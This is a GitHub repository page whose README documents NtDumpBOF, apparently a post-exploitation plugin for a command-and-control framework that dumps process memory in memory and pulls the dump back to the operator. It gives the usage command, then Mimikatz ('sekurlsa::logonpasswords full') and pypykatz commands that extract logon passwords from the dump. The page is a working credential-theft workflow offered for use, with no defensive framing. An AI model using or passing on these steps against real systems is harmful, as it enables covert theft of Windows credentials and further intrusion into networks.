Skip to content
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

NtDumpBOF

BOF port of the tool https://github.com/ricardojoserf/NativeDump written by @ricardojoserf.

Import NtDump.cna and run:

ntdump <filename>

The minidump file will be created in memory and downloaded using CALLBACK_FILE and CALLBACK_FILE_WRITE. Once downloaded the file will be visible at View -> Download.

This can subsequently be parsed using Mimikatz

mimikatz # sekurlsa::minidump <file path to downloaded minidump file>
mimikatz # sekurlsa::logonpasswords full

Or pypykatz

pypykatz lsa minidump <file path to downloaded minidump file>

About

No description, website, or topics provided.

Resources

Stars

1 star

Watchers

0 watching

Forks

Releases

Packages

Contributors

Languages